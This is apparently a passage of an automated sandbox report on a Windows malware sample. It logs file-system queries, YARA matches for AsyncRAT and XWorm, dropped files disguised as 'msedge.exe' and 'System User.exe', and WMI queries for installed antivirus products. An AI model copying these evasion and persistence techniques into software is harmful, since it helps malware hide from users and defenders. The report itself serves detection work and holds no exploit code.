                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\msedge.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dddd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\msedge.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dddd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7FF58D080
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A5EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7FF5A5EEC
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Source: msedge.exe, 0000000C.00000002.2749735501.000000001B4E3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2737051425.0000000000919000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2749735501.000000001B536000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2749735501.000000001B499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE
